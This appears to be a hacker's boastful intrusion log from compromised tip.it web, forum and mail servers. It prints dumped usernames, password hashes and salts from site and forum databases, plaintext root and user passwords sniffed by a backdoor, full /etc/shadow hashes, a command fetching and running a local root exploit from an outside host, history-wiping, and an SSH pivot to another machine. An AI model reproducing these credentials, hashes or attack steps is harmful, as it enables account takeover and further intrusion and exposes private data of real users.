-rw-rw-r-- 1 root apache 1002 Jan 4 2007 comparereqs.php
-rw-rw-r-- 1 peter peter 15124 Jul 21 2008 contactsubmits.php
-rw-rw-r-- 1 peter peter 473 Jul 21 2008 contactuspopup.php
-rw-rw-r-- 1 peter peter 961 Jul 23 2008 download.php
drwxrwxrwx 6 root apache 4096 Dec 20 2009 files
drwxrwxr-x 3 root apache 4096 Oct 3 2010 functions
drwxrwxr-x 2 root apache 4096 Jun 15 2008 handlers
-rw-rw-r-- 1 peter peter 421 Sep 14 2008 hosttest.php
drwxrwxr-x 2 root apache 4096 Sep 14 2008 includes
-rw-rw-r-- 1 root apache 25247 May 20 14:34 index.php
-rw-rw-r-- 1 root apache 130 Sep 24 16:50 info.php
-rw-rw-r-- 1 peter peter 12110 Jun 12 14:59 itempopup_search.php
drwxrwxr-x 4 peter peter 4096 Jun 12 14:58 js
-rw-rw-r-- 1 root apache 397 Apr 25 2006 keepalive.php
-rw-rw-r-- 1 root apache 4454 Apr 28 2006 login.old.php
-rw-rw-r-- 1 peter peter 10348 Jan 26 2011 login.php
drwxrwxr-x 8 root apache 4096 Jun 15 2008 map_team
-rw-rw-r-- 1 root apache 2270 May 30 2006 previewtimes.php
drwxrwxr-x 5 root apache 4096 Apr 2 2011 styles
drwxrwxr-x 2 root apache 4096 Jun 15 2008 tmp
drwxrwxr-x 2 root apache 4096 Sep 24 16:50 transfer
-rw-rw-r-- 1 root apache 533 Apr 25 2006 userguide_coders.php
-rw-rw-r-- 1 root apache 28370 Jul 16 2009 userguide.php
-rw-rw-r-- 1 root apache 4889 Apr 25 2006 userguidepopup.php
[root@web01 adds]# head -n010 login.php
*------------------------------------------------------------------------------
*/
session_start();
[root@web01 adds]# head -n100 login.php
*------------------------------------------------------------------------------
*/
session_start();
//include stuff
include('functions/db_connect_guides.php');
require_once('functions/admin.php');
ini_set('error_reporting', E_ALL);
function prepareinput($array)
{
foreach($array as $key => $value)
{
if (!is_array($array[$key]))
{
$value = stripslashes($value);
$value = mysql_real_escape_string($value);
$array[$key] = $value;
}
}
return $array;
}
prepareinput($_POST);
function login($msg, $disable, $user)
{
$disabled = '';
if($disable == 'true')
{
$disabled = ' disabled';
}
print '
Restricted Area :: '.$msg.'
';
}
if(!isset($_SESSION['count']))
{
$_SESSION['count'] = 0;
}
if ($_SESSION['count'] > 3)
{
login('Too many incorrect logins', 'true');
exit();
}
if(isset($_GET['logout']))
{
if(isset($_COOKIE['session_info']) || isset($_COOKIE['session_info_id']))
{
setcookie("session_info", "", time()-60*60*24*100, "/");
setcookie("session_info_id", "", time()-60*60*24*100, "/");
}
if(isset($_SESSION['session_info']))
{
[root@web01 adds]# cat functions/db_connect_guides.php
[root@web01 adds]# cd ..
[root@web01 html]# ls -al
total 716824
drwxr-xr-x 20 root root 4096 Oct 11 07:45 .
drwxr-xr-x 21 root root 4096 Jun 28 09:06 ..
drwxrwxr-x 13 root apache 4096 Oct 11 07:53 adds
-rw-rw-r-- 1 eira eira 499 Dec 20 2003 back.JPG
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal2.html
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal.html
drwxr-xr-x 3 eira eira 4096 Jan 16 2007 common
drwxr-xr-x 3 eira eira 4096 Feb 8 2005 daoc
drwxr-xr-x 4 eira eira 4096 Jul 10 2008 eira
drwxr-xr-x 7 eira eira 4096 Aug 19 2008 error_404
-rw-r--r-- 1 eira eira 2274 Dec 21 2003 favicon.ico
drwxr-xr-x 3 root root 4096 Aug 20 2008 gladiatus
-rw-r--r-- 1 root root 0 Dec 25 2006 google13ce76cda5634bd5.html
drwxr-xr-x 4 eira eira 4096 Jan 30 2006 img
-rw-rw-r-- 1 eira eira 1507 Jun 22 2004 index.html
-rw-r--r-- 1 root root 20509161 Oct 11 07:54 phpbb_users.txt
-rw-r--r-- 1 root root 16 Mar 25 2005 phpinfo_x.php
-rw-r--r-- 1 root root 0 Sep 21 2007 robots.txt
-rw-r--r-- 1 root root 1548 Jan 16 2007 robots.txt-old
drwxrwxr-x 13 eira apache 4096 Oct 3 2010 rsc
drwxrwxr-x 31 eira apache 4096 Oct 7 00:59 runescape
drwxr-xr-x 9 root root 4096 Sep 24 2007 silks
-rw-rw-r-- 1 eira eira 15698 Dec 20 2003 Silverion.jpg
-rw-r--r-- 1 root root 141686 Jun 6 2007 sitemap2.xml
-rw-r--r-- 1 root root 15276 Jun 6 2007 sitemap.xml
drwxr-xr-x 2 root root 4096 Mar 28 2005 stats
-rw-rw-r-- 1 eira eira 34462 Jun 22 2004 tipitlayout1c.jpg
drwxr-xr-x 2 webalizer root 4096 Jul 1 2005 usage
drwxr-xr-x 5 eira eira 4096 Sep 26 06:27 vela
-rw-r--r-- 1 root root 114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x 3 eira eira 4096 Aug 9 2007 vocegiuliana
drwxr-xr-x 2 eira eira 4096 Aug 9 2007 volantini
drwxr-xr-x 3 eira eira 4096 Jun 9 2008 wizard
-rw-r--r-- 1 root root 127 Jan 15 2007 y_key_56098cca870c821d.html
drwxr-xr-x 2 root root 4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira eira 4096 Jun 24 01:08 zenit-with-holes
-rw-r--r-- 1 root root 598370689 Jun 24 01:44 zenit.zip
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| lotro |
| runescape |
| war |
+--------------------+
4 rows in set (0.00 sec)
mysql> show tables;
+---------------------------+
| Tables_in_runescape |
+---------------------------+
| adds_approvals |
| adds_auth |
| adds_categories |
| adds_images |
| adds_ip |
| adds_log |
| adds_sessions |
| adds_uploads |
| adds_users |
| members |
| rs2_atlas |
| rs2_calculators |
| rs2_calculators_arrays |
| rs2_citadel |
| rs2_citadel_slot |
| rs2_clanlist |
| rs2_clans_news |
| rs2_clans_pages |
| rs2_construction |
| rs2_contactus |
| rs2_diversion_locations |
| rs2_diversion_pair |
| rs2_diversion_week |
| rs2_dynamic_approve |
| rs2_dynamic_bans |
| rs2_dynamic_log |
| rs2_dynamic_statcache |
| rs2_events |
| rs2_events_comments |
| rs2_events_scores |
| rs2_events_scores_players |
| rs2_events_scores_year |
| rs2_events_teams |
| rs2_featured |
| rs2_gecache |
| rs2_genames |
| rs2_gerecords |
| rs2_getimes |
| rs2_guides |
| rs2_hitscheck |
| rs2_microhelper |
| rs2_monster |
| rs2_monster_attacks |
| rs2_monster_groups |
| rs2_monster_items |
| rs2_monster_reports |
| rs2_news |
| rs2_pages |
| rs2_poll |
| rs2_poll2 |
| rs2_poll2_answers |
| rs2_poll2_votes |
| rs2_poll_results |
| rs2_poll_votes |
| rs2_quest |
| rs2_quest_draft |
| rs2_quest_pages |
| rs2_quest_reports |
| rs2_quest_req |
| rs2_races |
| rs2_report_ban |
| rs2_report_flood |
| rs2_subquests |
| rs2_summon |
| rs2_times |
| rs2_times_dategroups |
| rs2item |
| rs2item_categories |
| rs2item_group_items |
| rs2item_groups |
| rs2item_reports |
| rs2item_stats |
| rs2item_subcat |
| rs2shops |
| rs2shops_city |
| rs2shops_currency |
| rs2shops_kingdom |
| rs2shops_report |
| rs2shops_reportstock |
| rs2shops_stock |
| rs2shops_type |
| rsc_bestiary |
| staff_position |
| staff_users |
+---------------------------+
84 rows in set (0.00 sec)
mysql> select concat_ws(0x3a,user_name,password,salt) from adds_users;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 11415326
Current database: runescape
+----------------------------------------------------------+
| concat_ws(0x3a,user_name,password,salt) |
+----------------------------------------------------------+
| Silverion:reset:1f8a04f00 |
| SerpentEye:17da56625f34972c22f117899a5d0b15:7505d9618 |
| pokemama:88d5ef7cb02d4505d4f8e65ec597fbd6:a2d14e70e |
| Neminon:e471395f84f7a7a35d246f9f7160ad72: |
| boomer12342:f29f9860bda0f8b859dd23268ecc7297:8dfcee96f |
| Vhellcat:c701886bf870bcdc805f76b5fd374dc7:08bf200db |
| TecMaster532:cd06d27dd29ccbd6e07696da9c60b723:3cfea708e |
| tripsis:61e375455c3098a8eb025509b0c01ce2:a6540538c |
| Siobhana:9cba134889178fab200681778ed64bc7:07aa5e9a6 |
| Cowman_Alt:64e77b28db2690a3f634f2b0bf6cfcd4:a5f45f4ff |
| Jafje:ff34beeb4b3ca02f56c0220f55cff497:d877c37b1 |
| BloodAngel:d98a9d8f98897615a6d9d7564e5ff96a:270972c7e |
| Speedyshel:f84faf4a6559b31970a5a9011d23834a:cc18e9930 |
| Octarine19:7c36cce68f9638084e1a9e59bcc35049:bd4fbd2b5 |
| ForsakenMage:ada76cc2ab885d5f7279e80922d7a71d:e45a31d57 |
| RussetAlpha:b487ad58bbf037f95e71233e715a5dad:53a7ec27a |
| Cruiser:a5dfbc4b586c7c4cafa22f2ad0ee5b96:1d553218b |
| odd:f8ff8c31ba125143553ec938e5b12d20:61ca14d4a |
| Peter:951089f4243b3d8a6f3594c93044e760:3e53bd8f5 |
| Howlin0001:68330b7b8312607a2bfe8c9c19871b91:35dea8edb |
| Cowman_133:299aaa335c3a495bbf3d1cafd058f5cd:9675427ce |
| Wyvren2000:705388e025c0a735fc1da8db7e712c2b:6c073222b |
| Omnitec:reset:3ec004ab3 |
| Neglexis:2ebad4e50ce6f35a8475dbee4e56eb96:e38cd9ef9 |
| All Bogs:9654c5c25c0c8ef1a388a72752838789:7a8173c33 |
| SupaDavis:ef62d3d94a47a37b7da6fddc57f8ad8c:b709c0781 |
| Warriormonkx:8a062a10beaba882dcd3df5e8c7bee02:dcf7f7c69 |
| Y_Guy:7acbe93c2fe874ce0ed3ae41e08f3459:4a223174a |
| Wisse:a193694d7c0b81fef013981c9b4e6f28:ef42c869d |
| Quyneax:bac515af1da4bfaaad2784252d486437:072df5de1 |
| Georgelemmons:a62aa37c706d7b771248c482a5967f1d:0ddb6568e |
| Racheya:016ae44475e45249916f8b95dd86d01c:2f88b1ecb |
| thiesje:cdcfdc5b16348885ea7463faf28b9bf5:8c6fa1bd7 |
| Rien_Adelric:0d8151822c4c0969a0055301c162221b:8fd0c8e29 |
| Mil:e7a650a25af5937e73c7f49a229a6f6b:51fde375f |
| Xena_Dragon:934151f9705764bf2210525929df0d71:b3cc89564 |
| Salleh:2ea800dd6342b4c5c1b0c8feaed1d9b9:ba42b9413 |
| Dudecrush8:9a97271a9fbc5cdc946f92baa8ee34e8:6cb5adb7e |
| Shelby_Polo:2f58410c5ed973d69b4ba033616788ba:426bc7a2c |
| Rainy_Day:303096af8ea595fd0107324785ab25b8:b2dc94661 |
| Aurhora:9592eda4def55c8039a05b5ed3c774f9:66cdecae4 |
| qloque:846239db337c953829c787f0942c170e:254287237 |
| RobocopIsWin:e4866132c88592ece4ac96ef18df5aa9:346f55d94 |
| Alaz:538c7ae1ad111f526333891211e1a4c0:8d22758d6 |
| Woofumz:63472704bdf216b612a2da024726958a:af48fb8b4 |
| jimmy_jim:reset:415d8a35d |
| Evaluate:a95f91b0f1aa28dd4407885c6ed41bf1:9f3e31d31 |
+----------------------------------------------------------+
And now...just for lulz, we sniffed da root passwordz
[root@web01 bulat]# cat /root/.bdlogs
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: root:WBSCt92b
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: root:WBSCt92b
login in: root:WBSCt92b
login at: 208.43.229.199 bulat:
login at: 208.43.229.199 bulat:
^That makes one box, NOW FOR DA NEXT!@#$#$%^&&**((@(@(@))))@)@)@)@)#)#)#)#)#)#)##)#)#)#)#)#)#)#)#)#0
[bulat@forumx ~]$
[bulat@forumx ~]$ wget niqqaz.rs/0dayhidden -O tr1p >> /dev/null
[bulat@forumx ~]$ ./tr1p
Enter b1tch key: ***************
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff81062417
[+] Resolved prepare_kernel_cred to ffffffff810622f8
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@forumx ~]# export HISTFILE=/dev/null
[root@forumx ~]# uname -a; id
Linux forumx.tip.it 2.6.30.10-105.2.23.fc11.x86_64 #1 SMP Thu Feb 11 07:06:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@forumx ~]# last -a |less
root tty1 Tue Oct 11 07:42 gone - no logout
reboot system boot Tue Oct 11 07:23 (00:45) 2.6.30.10-105.2.23.fc11.x86_64
peter pts/0 Tue Oct 11 05:23 - down (01:56) stu8fa4.kent.ac.uk
reboot system boot Mon Oct 10 09:42 (21:37) 2.6.30.10-105.2.23.fc11.x86_64
peter pts/1 Sun Oct 9 18:57 - 19:21 (00:24) stu8fa4.kent.ac.uk
root pts/1 Mon Oct 3 10:38 - 11:27 (00:48) 188-230-152-15.dynamic.t-2.net
peter pts/2 Sun Oct 2 08:04 - 09:15 (01:11) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
root pts/1 Sun Oct 2 08:04 - 00:46 (16:42) 188-230-152-15.dynamic.t-2.net
root pts/1 Fri Sep 30 01:24 - 08:24 (06:59) bsn-176-196-23.dial-up.dsl.siol.net
peter pts/1 Thu Sep 29 07:29 - 08:53 (01:23) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
root pts/1 Tue Sep 27 02:23 - 04:31 (02:07) 188-230-152-15.dynamic.t-2.net
root pts/2 Mon Sep 26 15:07 - 22:06 (06:59) 188-230-152-15.dynamic.t-2.net
peter pts/1 Mon Sep 26 14:27 - 16:33 (02:05) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
[root@forumx ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:499:498:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
backuppc:x:497:496::/var/lib/BackupPC:/usr/bin/nologin
torrent:x:496:495:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
lighttpd:x:495:490:lighttpd web server:/var/www/lighttpd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi-autoipd:x:494:489:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
peter:x:501:48::/home/peter:/bin/bash
teamspeak:x:502:502::/home/teamspeak:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
unbound:x:493:488:Unbound DNS resolver:/etc/unbound:/sbin/nologin
pulse:x:492:487:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sphinx:x:491:484:Sphinx Search:/var/lib/sphinx:/bin/bash
clamav:x:490:483:Clamav database update user:/var/lib/clamav:/sbin/nologin
[root@forumx ~]# cat /etc/shadow
root:$1$YrhwGJ9V$KQHuSZO40Bp0svjl/KxoY0:15258:0:99999:7:::
bin:*:14115:0:99999:7:::
daemon:*:14115:0:99999:7:::
adm:*:14115:0:99999:7:::
lp:*:14115:0:99999:7:::
sync:*:14115:0:99999:7:::
shutdown:*:14115:0:99999:7:::
halt:*:14115:0:99999:7:::
mail:*:14115:0:99999:7:::
news:*:14115:0:99999:7:::
uucp:*:14115:0:99999:7:::
operator:*:14115:0:99999:7:::
games:*:14115:0:99999:7:::
gopher:*:14115:0:99999:7:::
ftp:*:14115:0:99999:7:::
nobody:*:14115:0:99999:7:::
nscd:!!:14115:0:99999:7:::
vcsa:!!:14115:0:99999:7:::
distcache:!!:14115:0:99999:7:::
tcpdump:!!:14115:0:99999:7:::
rpm:!!:14115:0:99999:7:::
ntp:!!:14115:0:99999:7:::
squid:!!:14115:0:99999:7:::
dbus:!!:14115:0:99999:7:::
polkituser:!!:14115:0:99999:7:::
apache:!!:14115:0:99999:7:::
avahi:!!:14115:0:99999:7:::
openvpn:!!:14115:0:99999:7:::
named:!!:14115:0:99999:7:::
rpcuser:!!:14115:0:99999:7:::
nfsnobody:!!:14115:0:99999:7:::
mailnull:!!:14115:0:99999:7:::
smmsp:!!:14115:0:99999:7:::
sshd:!!:14115:0:99999:7:::
webalizer:!!:14115:0:99999:7:::
dovecot:!!:14115:0:99999:7:::
backuppc:!!:14115:0:99999:7:::
torrent:!!:14115:0:99999:7:::
haldaemon:!!:14115:0:99999:7:::
mysql:!!:14116::::::
xfs:!!:14119::::::
bulat:$1$ZgjnuDTq$zwXg5PW4oa5ZK5ETOyIMp0:14119:0:99999:7:::
lighttpd:!!:14142::::::
postfix:!!:14142::::::
avahi-autoipd:!!:14154::::::
peter:$1$8DGBPy.f$57BMYWsBl4VyMnwnJqKKV0:15196:0:99999:7:::
teamspeak:$1$yb1s1A.E$KrNgLaB9qTZvI5Sv8kgnr/:14230:0:99999:7:::
rpc:!!:14722:0:99999:7:::
oprofile:!!:14722::::::
unbound:!!:14817::::::
pulse:!!:14817::::::
sphinx:!!:14817::::::
clamav:!!:15149::::::
[root@forumx html]# ls -al
total 36
drwxr-xr-x. 5 root root 4096 2010-08-18 15:20 .
drwxr-xr-x. 9 root root 4096 2010-04-06 17:31 ..
drwxr-xr-x 15 peter apache 4096 2011-10-11 06:07 forum.tip.it
-rw-r--r-- 1 root root 202 2008-07-12 20:50 index.html
-rw-r--r-- 1 root root 746 2008-06-05 13:51 index.html.bak
drwxr-xr-x 11 root root 4096 2008-06-14 10:39 lotro.tip.it
drwxrwxrwx 12 root root 4096 2008-06-14 10:39 nosf.tip.it
[root@forumx html]# cd forum.tip.it
[root@forumx forum.tip.it]# cat conf_global.php
Some more lulz-
mysql> select concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) from members limit 0,100;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 8246
Current database: forum2009
+-----------------------------------------------------------------------------------+
| concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) |
+-----------------------------------------------------------------------------------+
| ipstech:811743d8d526fc93ebccc21868b5dc01:p2juR:0 |
| raenond:a51db4af185443c9eda7959bbc1db46b:|Xx@^ |
| newptor:7dbe3455cbe75ccaf323f0fdc60c343c::1 |
| forsakenmage:b16c211fd7ece57d27a26a6b3af2dc6f::0 |
| ma6bi0ahk:5da6d54b3a62471dca4b9149fffea480:2RfQJ |
| grornemow:e8ae9223c7e9d10732696e944f170339:r&rxP |
| stephenpope95:de999ecfb8bd7a324a21c14c17eafc40:y>;{N |
| snowstorm:a4d4a28ac7555cc63dabf97a4a6bf859:&#}7C |
| pyro:: |
| greatsilverwyrm:ec3cce8f7202359d5736747033764d31: |
| tsai:: |
| ladysarafina:: |
| lightning:816480113af7100424d2f25a362c559d:bU^Oi |
| exarch:: |
| mage_burner:f79b3d203951b862c4b8b6da4abfcac2:O#8ZG |
| ks_jeppe:: |
| sunli:c49b237e7c06fc7dcb9f74e535329289::0 |
| eeeeediot:623289da6a24f789119314ea84468a5c:y*+y1 |
| nathaninch:c9768daf5bf630888a1b8089467ccfdc::0 |
| fat_slug:a6c56934e826c1a4e024e7fb8792a2fc:?o70?:0 |
| swamp_cat:: |
| deadman_andy:: |
| spencerm98:: |
| tomato:8efa60748b553eef472ae9f2c18c559a: |
| swifty_mcvae:: |
| the_sith:41cbdb3a5812fbb4bbea15fdbe860783: |
| misplacedme:5ccd22ceef73abf706205231926b99ad:idmSP:0 |
| red_tanya:481b5be84b6fdf41209287e5b4ecbd9f:>7kSW:0 |
| ryl:: |
| meesy:: |
| grin_king:: |
| runegirlie:725f06fee6d8ae7a16907dba70f7970a: |
| wistan:: |
| weezcake:6dbc57cc53dfd9a55169d2a3e45cf2df: |
| dusqi:853606dbc6d91e2d9c3150d18c7d3d7b: |
| silverion:86038e207109d75b5d4ca3fed3f77515:N!}v;:0 |
| troydosdos:26adab7d89084975f19f4726feba94df:Lg4/O |
| leon_art:8401deaafc1e650873141fb288148e8c:Zyauw |
| wmathewphelpsr:0c7f31c983ff159a2df84f8b18653099:.SvI} |
| thunder:: |
| bobdabuilda:: |
| sunspeak:15da5ede7bd58b954d20ff3fa5a8c00e:M*T;` |
| rease:5a23d8c8d72eb409b676224e478c3fc8:h.UBm |
| militaris:109bff6a3dd1ca020dfa8403a156c709:44.%z |
| cameron:: |
| swtkittn:dbd1975e4055c1cd36e0e1acae1928c8: |
| centuramage:: |
| zidanect:3ea3599bff9d19a9fea14a750d82555a::0 |
| chicken:: |
| insane:34aa5866c803ab64fc2b43ff7897a402: |
| dromaruk:: |
| usara:72fc5241b75e9ee7a1dabd793cebf3fd:z|Ybh |
| gumby:: |
| herr:: |
| lageris89:: |
| mideea:: |
| cruiser:59fec7c72e4b9b14446101618d06cb10: |
| leylen:577fa11e45922b41b2e67c373b1a9047: |
| rpg_pro:62de274e1926c5640fed496626d3cf81:R/Un# |
| sidewinder:: |
| tomiz:: |
| punk4ever:: |
| jammy316:: |
| sandytrain:: |
| netbent:: |
| cellkiller20:11d74d43fbca17192a3b18cb56c0ea66:[zEE' |
| craven_image:1f99956e517d2bdb9edd2ab95ba1d666:u(-LT |
| emp:: |
| lord9000:: |
| kylepetty:: |
| smoressoccer:a01d93f665bf6cb96dd7c2a907a08f42: |
| paul:: |
| mystical25:: |
| phunk:: |
| andrew:: |
| the_pure12:: |
| 2cansamyboy:: |
| pepsi16:: |
| godofend:: |
| coolhaz7000:: |
| bluetear:2b3ffba93ff4ff5bf913d3cd32dc1a8d: |
| phil:18d40b67a951ffd2111600af162e4204: |
| sneakydiva:: |
| xxxxthugxxxx:: |
| lord:: |
| annie:: |
| pker_dude_jr:49362d81bd5318dacf86ea4f0477f9f1: |
| juha_itse:: |
| matt:: |
| nik:: |
| blue107:a5085415200c7ef8da98b59e4834b819: |
| greenminer:1d9704bfc517f297a06e2cb62102a3cb: |
| ex1le:: |
| gathra:526a36f262203f006b73913bdec4ef1f:|jJIm |
| moridin:599e4766740f874be5076cca7b9215d8:ybg`l |
| _kinslayer_:: |
| psycho:: |
| ultrasmasher:f7e0a2681c4f46f649ff00e37d3d14dd: |
| sin_q:: |
| anonimouse69:: |
+-----------------------------------------------------------------------------------+
100 rows in set (0.13 sec)
--NEXT BOX
[root@forumx bulat]# ssh gaspez-arts.com -lroot
The authenticity of host 'gaspez-arts.com (66.36.248.197)' can't be established.
RSA key fingerprint is 58:7c:8e:2b:1c:80:41:ad:15:65:98:72:31:3a:48:8e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'gaspez-arts.com,66.36.248.197' (RSA) to the list of known hosts.
root@gaspez-arts.com's password:
Last login: Fri Sep 30 13:33:04 2011 from 188-230-152-15.dynamic.t-2.net
[root@mail ~]# uname -a;id
Linux mail.tip.it 2.6.23.17-88.fc7 #1 SMP Thu May 15 00:35:10 EDT 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@mail arena_test]# last -a
eira pts/0 Mon Oct 10 04:53 - 07:06 (02:12) 95.233.233.42
eira pts/0 Sat Oct 8 01:22 - 03:37 (02:14) host17-203-dynamic.58-82-r.retail.telecomitalia.it
eira pts/1 Thu Oct 6 03:26 - 05:43 (02:17) host46-171-dynamic.56-82-r.retail.telecomitalia.it
[root@mail eira]# cat .bash_history | tail
ls -al
exit
cd /etc/httpd/conf.d
ls -al
su
cd /etc/httpd/conf.d
su
w
cd /etc/httpd/conf.d
su
[root@mail ~]# ls -la /var/www
total 16656
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 .
drwxr-xr-x 25 root root 4096 2007-10-19 10:20 ..
drwxr-xr-x 12 eira eira 4096 2008-08-31 11:00 arena
drwxr-xr-x 10 eira eira 4096 2006-10-27 05:01 arena_old
drwxr-xr-x 5 eira eira 4096 2011-08-01 07:29 arredareinsieme
drwxr-xr-x 17 eira eira 4096 2009-11-30 18:16 asquinimobili
drwxr-xr-x 3 eira eira 4096 2010-07-06 11:23 atc
drwxr-xr-x 11 eira eira 4096 2010-03-29 16:07 cetekor
drwxr-xr-x 2 eira eira 4096 2010-03-19 11:40 cetekor_mom
drwxr-xr-x 2 root root 4096 2008-01-24 10:45 cgi-bin
drwxr-xr-x 7 eira eira 4096 2011-06-13 10:10 common
drwxr-xr-x 9 eira eira 4096 2009-03-29 07:01 control_panel
drwxr-xr-x 2 eira eira 4096 2011-06-13 10:09 dompdf
drwxr-xr-x 2 eira eira 4096 2008-08-26 12:17 easygadget
drwxr-xr-x 11 eira eira 4096 2011-07-07 02:56 ecolo
drwxr-xr-x 25 eira eira 4096 2011-06-07 03:18 eira
drwxr-xr-x 7 eira eira 4096 2009-04-22 06:45 erboristeria
drwxr-xr-x 3 root root 4096 2008-03-14 07:48 error
drwxr-xr-x 3 root root 4096 2008-01-24 10:45 html
-rw-r--r-- 1 root root 4229120 2007-05-05 16:24 html.tar
drwxr-xr-x 3 root root 4096 2008-05-24 04:10 icons
drwxr-xr-x 4 eira eira 4096 2006-11-18 16:19 img
-rw-r--r-- 1 root root 12584960 2007-05-05 16:24 img.tar
drwxr-xr-x 7 eira eira 4096 2010-03-05 02:10 irontrader
drwxr-xr-x 15 eira eira 4096 2010-07-14 05:43 kitepower
drwxr-xr-x 14 root root 12288 2008-03-14 07:48 manual
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 mauri
-rw-r--r-- 1 root root 20480 2007-05-05 16:24 mauri.tar
drwxr-xr-x 2 eira eira 4096 2009-05-17 06:43 mdarredamenti
drwxr-xr-x 17 eira eira 4096 2011-10-09 06:53 miniatures
drwxr-xr-x 10 eira eira 4096 2009-05-07 12:50 molino
drwxr-xr-x 18 eira eira 4096 2011-06-25 03:32 pavimenti
drwxr-xr-x 6 eira eira 4096 2011-06-25 18:02 supportservice
drwxr-xr-x 9 eira eira 4096 2010-08-08 12:59 trieste
drwxr-xr-x 3 eira eira 4096 2008-07-14 13:39 ts_affitta
drwxr-xr-x 2 webalizer root 12288 2011-10-01 04:22 usage
drwxr-xr-x 6 eira eira 4096 2007-01-02 07:24 virtualftp
drwxr-xr-x 14 eira eira 4096 2011-06-24 11:59 westistramodus
drwxr-xr-x 2 eira eira 4096 2010-03-01 03:31 wip
[root@mail www]# cd mauri
[root@mail mauri]# ls -al
total 84
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 .
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 ..
drwxrwxr-x 2 eira eira 4096 2008-02-15 13:47 ~atc
drwxrwxr-x 2 eira eira 4096 2007-11-26 16:04 avatar
drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 blog
drwxrwxr-x 2 eira eira 4096 2011-05-30 08:11 DOM_PDF
drwxr-xr-x 2 eira eira 4096 2008-03-13 10:05 file
-rw-r--r-- 1 eira eira 4356 2007-08-14 11:37 index.html-1
-rw-r--r-- 1 eira eira 4565 2007-10-08 11:48 index.html-2
-rw-rw-r-- 1 eira eira 2217 2011-04-05 04:22 index.php
-rw-r--r-- 1 eira eira 4697 2007-10-08 11:56 index.php-1
-rw-r--r-- 1 eira eira 224 2008-06-06 18:06 ip.php
